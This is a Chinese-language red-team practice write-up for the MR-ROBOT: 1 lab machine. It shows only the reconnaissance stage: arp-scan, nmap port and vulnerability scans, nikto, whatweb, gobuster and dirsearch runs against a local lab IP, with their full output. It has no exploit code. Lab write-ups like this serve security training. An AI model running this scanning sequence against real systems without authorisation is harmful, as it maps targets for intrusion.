红队打靶练习:MR-ROBOT: 1

信息收集

1、arp

┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.130  00:0c:29:84:a3:b7       VMware, Inc.
192.168.12.254  00:50:56:fb:5b:5a       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.348 seconds (109.03 hosts/sec). 4 responded

---

2、nmap

主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 09:20 CST
Nmap scan report for 192.168.12.1
Host is up (0.00038s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.130
Host is up (0.00018s latency).
MAC Address: 00:0C:29:84:A3:B7 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00093s latency).
MAC Address: 00:50:56:FB:5B:5A (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.36 seconds

---

端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.130 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 09:22 CST
Nmap scan report for 192.168.12.130
Host is up (0.00065s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 00:0C:29:84:A3:B7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds


快速提取端口信息

┌──(root㉿ru)-[~/kali]
└─# cat port.nmap | awk '{print $1}' | head -n 8 | tail -n 3 | awk -F "/" '{print $1}' | xargs -n 3 | sed 's/ /,/g'

22,80,443

┌──(root㉿ru)-[~/kali]
└─# cat port.nmap | awk '{print $1}' | head -n 8 | tail -n 3 | awk -F "/" '{print $1}' | xargs -n 3 | sed 's/ /,/g' >> port

┌──(root㉿ru)-[~/kali]
└─# cat port
22,80,443

---

信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -A -p 22,80,443 192.168.12.130 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 09:26 CST
Nmap scan report for 192.168.12.130
Host is up (0.00030s latency).

PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
MAC Address: 00:0C:29:84:A3:B7 (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 3.2 - 4.9 (94%), Linux 3.2 - 3.8 (93%), Linux 3.18 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.16 - 4.6 (91%), Linux 2.6.26 - 2.6.35 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 192.168.12.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.09 seconds

---

漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 22,80,443 192.168.12.130 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 09:29 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.130
Host is up (0.00024s latency).

PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2
|   /feed/: Wordpress version: 4.3.32
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.12.130
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.12.130:80/js/rs;if(s.useForcedLinkTracking||s.bcf){if(!s."+"forcedLinkTrackingTimeout)s.forcedLinkTrackingTimeout=250;setTimeout('if(window.s_c_il)window.s_c_il['+s._in+'].bcr()',s.forcedLinkTrackingTimeout);}else
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/rs;if(s.useForcedLinkTracking||s.bcf){if(!s."+"forcedLinkTrackingTimeout)s.forcedLinkTrackingTimeout=250;setTimeout('if(window.s_c_il)window.s_c_il['+s._in+'].bcr()',s.forcedLinkTrackingTimeout);}else
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/u;c.appendChild(o);'+(n?'o.c=0;o.i=setTimeout(f2,100)':'')+'}}catch(e){o=0}return
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/u;c.appendChild(o);'+(n?'o.c=0;o.i=setTimeout(f2,100)':'')+'}}catch(e){o=0}return
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/BASE_URL1%22/live/%221;this.firstBoot?(this.firstBoot=!1,this.track.omni("Email
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/BASE_URL1%22/live/%221;this.firstBoot?(this.firstBoot=!1,this.track.omni("Email
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/vendor/null1this.tags.length10%7D1t.get1function11%7Bif1011this.tags.length1return
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/vendor/null1this.tags.length10%7D1t.get1function11%7Bif1011this.tags.length1return
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/e1t.type1%22text/javascript%221n.getElementsByTagName1%22head%221%5B0%5D.appendChild1t1%7Dt.supports1%7Bsimple1o1%22simple%2211flag1o1%22flag%221%7D1t.DOMReady1111t.readyCallback1function11%7Bt.DOMReady110%7D1t.supports.simple11t.supports.flag%7C%7C1a1function11%7Bt.readyCallback11%7D1n.addEventListener?(n.addEventListener("DOMContentLoaded",a,!1),e.addEventListener("load",a,!1)):(e.attachEvent("onload",a),n.attachEvent("onreadystatechange",function(){"complete"===n.readyState&&t.readyCallback()})),(a=t.source||{}).concatemoji?i(a.concatemoji):a.wpemoji&&a.twemoji&&(i(a.twemoji),i(a.wpemoji)))}(window,document,window._wpemojiSettings);
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/js/e1t.type1%22text/javascript%221n.getElementsByTagName1%22head%221%5B0%5D.appendChild1t1%7Dt.supports1%7Bsimple1o1%22simple%2211flag1o1%22flag%221%7D1t.DOMReady1111t.readyCallback1function11%7Bt.DOMReady110%7D1t.supports.simple11t.supports.flag%7C%7C1a1function11%7Bt.readyCallback11%7D1n.addEventListener?(n.addEventListener("DOMContentLoaded",a,!1),e.addEventListener("load",a,!1)):(e.attachEvent("onload",a),n.attachEvent("onreadystatechange",function(){"complete"===n.readyState&&t.readyCallback()})),(a=t.source||{}).concatemoji?i(a.concatemoji):a.wpemoji&&a.twemoji&&(i(a.twemoji),i(a.wpemoji)))}(window,document,window._wpemojiSettings);
|     Form id:
|     Form action: http://192.168.12.130/
|
|     Path: http://192.168.12.130:80/wp-login.php
|     Form id: loginform
|_    Form action: http://192.168.12.130/wp-login.php
443/tcp open   https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.12.130
|   Found the following possible CSRF vulnerabilities:
|
|     Path: https://192.168.12.130:443/js/BASE_URL
|     Form id:
|     Form action: https://192.168.12.130:443/
|
|     Path: https://192.168.12.130:443/js/BASE_URL
|     Form id:
|     Form action: https://192.168.12.130:443/
|
|     Path: https://192.168.12.130:443/js/rs;if(s.useForcedLinkTracking||s.bcf){if(!s."
|     Form id:
|     Form action: https://192.168.12.130:443/
|
|     Path: https://192.168.12.130:443/js/rs;if(s.useForcedLinkTracking||s.bcf){if(!s."
|     Form id:
|     Form action: https://192.168.12.130:443/
|
|     Path: https://192.168.12.130:443/js/u;c.appendChild(o);'+(n?'o.c=0;o.i=setTimeout(f2,100)':'')+'}}catch(e){o=0}return
|     Form id:
|     Form action: https://192.168.12.130:443/
|
|     Path: https://192.168.12.130:443/js/u;c.appendChild(o);'+(n?'o.c=0;o.i=setTimeout(f2,100)':'')+'}}catch(e){o=0}return
|     Form id:
|     Form action: https://192.168.12.130:443/
|
|     Path: https://192.168.12.130:443/js/vendor/null1this.tags.length10%7D1t.get1function11%7Bif1011this.tags.length1return
|     Form id:
|     Form action: https://192.168.12.130:443/
|
|     Path: https://192.168.12.130:443/js/vendor/null1this.tags.length10%7D1t.get1function11%7Bif1011this.tags.length1return
|     Form id:
|_    Form action: https://192.168.12.130:443/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2
|   /feed/: Wordpress version: 4.3.32
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder
MAC Address: 00:0C:29:84:A3:B7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 136.39 seconds

---

3、nikto

┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.130
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.130
+ Target Hostname:    192.168.12.130
+ Target Port:        80
+ Start Time:         2023-12-12 09:30:05 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /FelGxnzK.asmx: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /admin/: This might be interesting.
+ /image/: Drupal Link header found with value: ; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2023-12-12 09:33:03 (GMT8) (178 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

---

4、whatweb

┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.130
WhatWeb report for http://192.168.12.130
Status    : 200 OK
Title     : 
IP        : 192.168.12.130
Country   : RESERVED, ZZ

Summary   : Apache, HTML5, HTTPServer[Apache], Script, UncommonHeaders[x-mod-pagespeed], X-Frame-Options[SAMEORIGIN]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : Apache (from server string)

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all
        the standard headers and many non standard but common ones.
        Interesting but fairly common headers should have their own
        plugins, eg. x-powered-by, server and x-aspnet-version.
        Info about headers can be found at www.http-stats.com

        String       : x-mod-pagespeed (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the
        HTTP header. - More Info:
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 12 Dec 2023 01:36:30 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        X-Mod-Pagespeed: 1.9.32.3-4523
        Content-Encoding: gzip
        Cache-Control: max-age=0, no-cache
        Content-Length: 677
        Connection: close
        Content-Type: text/html

---

目录探测

1、gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.12.130 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 237] [--> http://192.168.12.130/images/]
/blog                 (Status: 301) [Size: 235] [--> http://192.168.12.130/blog/]
/sitemap              (Status: 200) [Size: 0]
/rss                  (Status: 301) [Size: 0] [--> http://192.168.12.130/feed/]
/login                (Status: 302) [Size: 0] [--> http://192.168.12.130/wp-login.php]
/0                    (Status: 301) [Size: 0] [--> http://192.168.12.130/0/]
/video                (Status: 301) [Size: 236] [--> http://192.168.12.130/video/]
/feed                 (Status: 301) [Size: 0] [--> http://192.168.12.130/feed/]
/image                (Status: 301) [Size: 0] [--> http://192.168.12.130/image/]
/atom                 (Status: 301) [Size: 0] [--> http://192.168.12.130/feed/atom/]
/wp-content           (Status: 301) [Size: 241] [--> http://192.168.12.130/wp-content/]
/admin                (Status: 301) [Size: 236] [--> http://192.168.12.130/admin/]
/audio                (Status: 301) [Size: 236] [--> http://192.168.12.130/audio/]
/intro                (Status: 200) [Size: 516314]
/wp-login             (Status: 200) [Size: 2696]
/css                  (Status: 301) [Size: 234] [--> http://192.168.12.130/css/]
/rss2                 (Status: 301) [Size: 0] [--> http://192.168.12.130/feed/]
/license              (Status: 200) [Size: 19930]
/wp-includes          (Status: 301) [Size: 242] [--> http://192.168.12.130/wp-includes/]
/readme               (Status: 200) [Size: 7334]
/js                   (Status: 301) [Size: 233] [--> http://192.168.12.130/js/]
/rdf                  (Status: 301) [Size: 0] [--> http://192.168.12.130/feed/rdf/]
/page1                (Status: 301) [Size: 0] [--> http://192.168.12.130/]
/robots               (Status: 200) [Size: 41]
/dashboard            (Status: 302) [Size: 0] [--> http://192.168.12.130/wp-admin/]
/%20                  (Status: 301) [Size: 0] [--> http://192.168.12.130/]
Progress: 5566 / 207644 (2.68%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 5576 / 207644 (2.69%)
===============================================================
Finished
===============================================================

---

2、dirsearch

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.12.130 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /usr/share/dirbuster/wordlists/reports/http_192.168.12.130/_23-12-12_09-39-58.txt

Target: http://192.168.12.130/

[09:39:58] Starting:
[09:39:58] 301 -  233B  - /js  ->  http://192.168.12.130/js/
[09:39:58] 301 -    0B  - /%2e%2e//google.com  ->  http://192.168.12.130/%2E%2E/google.com
[09:40:16] 403 -  218B  - /.user.ini
[09:40:17] 301 -    0B  - /0  ->  http://192.168.12.130/0/
[09:40:33] 301 -    0B  - /adm/index.php  ->  http://192.168.12.130/adm/
[09:40:33] 301 -  236B  - /admin  ->  http://192.168.12.130/admin/
[09:40:35] 200 -  614B  - /admin/
[09:40:37] 200 -  676B  - /admin/index
[09:40:38] 200 -  676B  - /admin/index.html
[09:40:38] 301 -    0B  - /admin/index.php  ->  http://192.168.12.130/admin/
[09:40:38] 301 -    0B  - /admin/mysql2/index.php  ->  http://192.168.12.130/admin/mysql2/
[09:40:38] 301 -    0B  - /admin/mysql/index.php  ->  http://192.168.12.130/admin/mysql/
[09:40:39] 301 -    0B  - /admin/phpMyAdmin/index.php  ->  http://192.168.12.130/admin/phpMyAdmin/
[09:40:39] 301 -    0B  - /admin/phpmyadmin/index.php  ->  http://192.168.12.130/admin/phpmyadmin/
[09:40:39] 301 -    0B  - /admin/phpmyadmin2/index.php  ->  http://192.168.12.130/admin/phpmyadmin2/
[09:40:39] 301 -    0B  - /admin/PMA/index.php  ->  http://192.168.12.130/admin/PMA/
[09:40:39] 301 -    0B  - /admin/pma/index.php  ->  http://192.168.12.130/admin/pma/
[09:40:39] 301 -    0B  - /admin2/index.php  ->  http://192.168.12.130/admin2/
[09:40:42] 301 -    0B  - /admin_area/index.php  ->  http://192.168.12.130/admin_area/
[09:40:58] 301 -    0B  - /adminarea/index.php  ->  http://192.168.12.130/adminarea/
[09:41:00] 301 -    0B  - /admincp/index.php  ->  http://192.168.12.130/admincp/
[09:41:01] 301 -    0B  - /adminer/index.php  ->  http://192.168.12.130/adminer/
[09:41:04] 301 -    0B  - /administrator/index.php  ->  http://192.168.12.130/administrator/
[09:41:12] 301 -    0B  - /apc/index.php  ->  http://192.168.12.130/apc/
[09:41:17] 301 -    0B  - /atom  ->  http://192.168.12.130/feed/atom/
[09:41:17] 301 -  236B  - /audio  ->  http://192.168.12.130/audio/
[09:41:19] 301 -    0B  - /axis//happyaxis.jsp  ->  http://192.168.12.130/axis/happyaxis.jsp
[09:41:19] 301 -    0B  - /axis2//axis2-web/HappyAxis.jsp  ->  http://192.168.12.130/axis2/axis2-web/HappyAxis.jsp
[09:41:19] 301 -    0B  - /axis2-web//HappyAxis.jsp  ->  http://192.168.12.130/axis2-web/HappyAxis.jsp
[09:41:21] 301 -    0B  - /bb-admin/index.php  ->  http://192.168.12.130/bb-admin/
[09:41:23] 301 -    0B  - /bitrix/admin/index.php  ->  http://192.168.12.130/bitrix/admin/
[09:41:24] 301 -  235B  - /blog  ->  http://192.168.12.130/blog/
[09:41:28] 301 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  http://192.168.12.130/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[09:41:29] 301 -    0B  - /claroline/phpMyAdmin/index.php  ->  http://192.168.12.130/claroline/phpMyAdmin/
[09:41:38] 301 -  234B  - /css  ->  http://192.168.12.130/css/
[09:41:39] 302 -    0B  - /dashboard  ->  http://192.168.12.130/wp-admin/
[09:41:39] 302 -    0B  - /dashboard/  ->  http://192.168.12.130/wp-admin/
[09:41:40] 301 -    0B  - /db/index.php  ->  http://192.168.12.130/db/
[09:41:41] 301 -    0B  - /dbadmin/index.php  ->  http://192.168.12.130/dbadmin/
[09:41:48] 301 -    0B  - /engine/classes/swfupload//swfupload_f9.swf  ->  http://192.168.12.130/engine/classes/swfupload/swfupload_f9.swf
[09:41:48] 301 -    0B  - /engine/classes/swfupload//swfupload.swf  ->  http://192.168.12.130/engine/classes/swfupload/swfupload.swf
[09:41:50] 301 -    0B  - /etc/lib/pChart2/examples/imageMap/index.php  ->  http://192.168.12.130/etc/lib/pChart2/examples/imageMap/
[09:41:52] 301 -    0B  - /extjs/resources//charts.swf  ->  http://192.168.12.130/extjs/resources/charts.swf
[09:41:52] 200 -    0B  - /favicon.ico
[09:41:53] 301 -    0B  - /feed  ->  http://192.168.12.130/feed/
[09:42:03] 301 -    0B  - /html/js/misc/swfupload//swfupload.swf  ->  http://192.168.12.130/html/js/misc/swfupload/swfupload.swf
[09:42:04] 301 -  237B  - /images  ->  http://192.168.12.130/images/
[09:42:04] 403 -  216B  - /images/
[09:42:04] 301 -    0B  - /image  ->  http://192.168.12.130/image/
[09:42:06] 200 -  665B  - /index.html
[09:42:06] 301 -    0B  - /index.php  ->  http://192.168.12.130/
[09:42:07] 301 -    0B  - /index.php/login/  ->  http://192.168.12.130/login/
[09:42:09] 301 -    0B  - /install/index.php?upgrade/  ->  http://192.168.12.130/install/?upgrade/
[09:42:09] 200 -  504KB - /intro
[09:42:11] 403 -  212B  - /js/
[09:42:14] 200 -    7KB - /license
[09:42:14] 200 -    7KB - /license.txt
[09:42:17] 302 -    0B  - /login  ->  http://192.168.12.130/wp-login.php
[09:42:18] 301 -    0B  - /login.wdm%20  ->  http://192.168.12.130/login.wdm
[09:42:18] 302 -    0B  - /login/  ->  http://192.168.12.130/wp-login.php
[09:42:27] 301 -    0B  - /modelsearch/index.php  ->  http://192.168.12.130/modelsearch/
[09:42:30] 301 -    0B  - /myadmin/index.php  ->  http://192.168.12.130/myadmin/
[09:42:30] 301 -    0B  - /myadmin2/index.php  ->  http://192.168.12.130/myadmin2/
[09:42:30] 301 -    0B  - /mysql-admin/index.php  ->  http://192.168.12.130/mysql-admin/
[09:42:30] 301 -    0B  - /mysql/index.php  ->  http://192.168.12.130/mysql/
[09:42:30] 301 -    0B  - /mysqladmin/index.php  ->  http://192.168.12.130/mysqladmin/
[09:42:37] 301 -    0B  - /panel-administracion/index.php  ->  http://192.168.12.130/panel-administracion/
[09:42:41] 301 -    0B  - /phpadmin/index.php  ->  http://192.168.12.130/phpadmin/
[09:42:41] 403 -   94B  - /phpmyadmin
[09:42:41] 301 -    0B  - /phpma/index.php  ->  http://192.168.12.130/phpma/
[09:42:44] 403 -   94B  - /phpmyadmin/
[09:42:44] 403 -   94B  - /phpmyadmin/ChangeLog
[09:42:44] 403 -   94B  - /phpmyadmin/doc/html/index.html
[09:42:44] 403 -   94B  - /phpmyadmin/docs/html/index.html
[09:42:44] 403 -   94B  - /phpmyadmin/index.php
[09:42:44] 403 -   94B  - /phpmyadmin/phpmyadmin/index.php
[09:42:44] 403 -   94B  - /phpmyadmin/README
[09:42:44] 403 -   94B  - /phpmyadmin/scripts/setup.php
[09:42:44] 301 -    0B  - /phpmyadmin-old/index.php  ->  http://192.168.12.130/phpmyadmin-old/
[09:42:44] 301 -    0B  - /phpMyAdmin.old/index.php  ->  http://192.168.12.130/phpMyAdmin.old/
[09:42:44] 301 -    0B  - /phpMyAdmin/index.php  ->  http://192.168.12.130/phpMyAdmin/
[09:42:44] 301 -    0B  - /phpMyAdmin/phpMyAdmin/index.php  ->  http://192.168.12.130/phpMyAdmin/phpMyAdmin/
[09:42:44] 301 -    0B  - /phpmyadmin0/index.php  ->  http://192.168.12.130/phpmyadmin0/
[09:42:44] 301 -    0B  - /phpmyadmin1/index.php  ->  http://192.168.12.130/phpmyadmin1/
[09:42:44] 301 -    0B  - /phpmyadmin2/index.php  ->  http://192.168.12.130/phpmyadmin2/
[09:42:45] 301 -    0B  - /phpMyadmin_bak/index.php  ->  http://192.168.12.130/phpMyadmin_bak/
[09:42:45] 301 -    0B  - /phpMyAdminold/index.php  ->  http://192.168.12.130/phpMyAdminold/
[09:42:46] 301 -    0B  - /pma-old/index.php  ->  http://192.168.12.130/pma-old/
[09:42:46] 301 -    0B  - /PMA/index.php  ->  http://192.168.12.130/PMA/
[09:42:46] 301 -    0B  - /pma/index.php  ->  http://192.168.12.130/pma/
[09:42:46] 301 -    0B  - /PMA2/index.php  ->  http://192.168.12.130/PMA2/
[09:42:47] 301 -    0B  - /pmamy/index.php  ->  http://192.168.12.130/pmamy/
[09:42:47] 301 -    0B  - /pmd/index.php  ->  http://192.168.12.130/pmd/
[09:42:47] 301 -    0B  - /pmamy2/index.php  ->  http://192.168.12.130/pmamy2/
[09:42:54] 200 -    4KB - /readme
[09:42:54] 200 -    4KB - /readme.html
[09:42:58] 200 -   41B  - /robots.txt
[09:42:58] 301 -    0B  - /roundcube/index.php  ->  http://192.168.12.130/roundcube/
[09:42:59] 301 -    0B  - /rss  ->  http://192.168.12.130/feed/
[09:43:09] 301 -    0B  - /siteadmin/index.php  ->  http://192.168.12.130/siteadmin/
[09:43:09] 200 -    0B  - /sitemap
[09:43:09] 200 -    0B  - /sitemap.xml
[09:43:09] 200 -    0B  - /sitemap.xml.gz
[09:43:12] 301 -    0B  - /sql/index.php  ->  http://192.168.12.130/sql/
[09:43:16] 301 -    0B  - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates  ->  http://192.168.12.130/sugarcrm/?module=Accounts&action=ShowDuplicates
[09:43:16] 301 -    0B  - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates  ->  http://192.168.12.130/sugarcrm/?module=Contacts&action=ShowDuplicates
[09:43:20] 301 -    0B  - /templates/beez/index.php  ->  http://192.168.12.130/templates/beez/
[09:43:20] 301 -    0B  - /templates/ja-helio-farsi/index.php  ->  http://192.168.12.130/templates/ja-helio-farsi/
[09:43:20] 301 -    0B  - /templates/rhuk_milkyway/index.php  ->  http://192.168.12.130/templates/rhuk_milkyway/
[09:43:23] 301 -    0B  - /tmp/index.php  ->  http://192.168.12.130/tmp/
[09:43:23] 301 -    0B  - /tools/phpMyAdmin/index.php  ->  http://192.168.12.130/tools/phpMyAdmin/
[09:43:24] 301 -    0B  - /typo3/phpmyadmin/index.php  ->  http://192.168.12.130/typo3/phpmyadmin/
[09:43:32] 301 -  236B  - /video  ->  http://192.168.12.130/video/
[09:43:37] 301 -    0B  - /web/phpMyAdmin/index.php  ->  http://192.168.12.130/web/phpMyAdmin/
[09:43:37] 301 -    0B  - /webadmin/index.php  ->  http://192.168.12.130/webadmin/
[09:43:39] 301 -  239B  - /wp-admin  ->  http://192.168.12.130/wp-admin/
[09:43:40] 200 -   21B  - /wp-admin/admin-ajax.php
[09:43:40] 302 -    0B  - /wp-admin/  ->  http://192.168.12.130/wp-login.php?redirect_to=http%3A%2F%2F192.168.12.130%2Fwp-admin%2F&reauth=1
[09:43:40] 500 -    3KB - /wp-admin/setup-config.php
[09:43:40] 200 -    0B  - /wp-config.php
[09:43:40] 301 -  241B  - /wp-content  ->  http://192.168.12.130/wp-content/
[09:43:40] 403 -  245B  - /wp-content/plugins/akismet/admin.php
[09:43:40] 403 -  247B  - /wp-content/plugins/akismet/akismet.php
[09:43:40] 301 -  281B  - /wp-content/plugins/all-in-one-wp-migration/storage  ->  http://192.168.12.130/wp-content/plugins/all-in-one-wp-migration/storage/
[09:43:40] 200 -    0B  - /wp-content/
[09:43:41] 403 -  228B  - /wp-content/uploads/
[09:43:41] 403 -  228B  - /wp-content/upgrade/
[09:43:41] 301 -    0B  - /wp-content/plugins/adminer/inc/editor/index.php  ->  http://192.168.12.130/wp-content/plugins/adminer/inc/editor/
[09:43:41] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[09:43:41] 500 -    0B  - /wp-content/plugins/hello.php
[09:43:41] 301 -  242B  - /wp-includes  ->  http://192.168.12.130/wp-includes/
[09:43:41] 403 -  221B  - /wp-includes/
[09:43:41] 500 -    0B  - /wp-includes/rss-functions.php
[09:43:41] 200 -    0B  - /wp-cron.php
[09:43:41] 200 -    1KB - /wp-login
[09:43:41] 200 -    1KB - /wp-login.php
[09:43:41] 200 -    1KB - /wp-login/
[09:43:41] 301 -    0B  - /wp-register.php  ->  http://192.168.12.130/wp-login.php?action=register
[09:43:41] 302 -    0B  - /wp-signup.php  ->  http://192.168.12.130/wp-login.php?action=register
[09:43:42] 301 -    0B  - /www/phpMyAdmin/index.php  ->  http://192.168.12.130/www/phpMyAdmin/
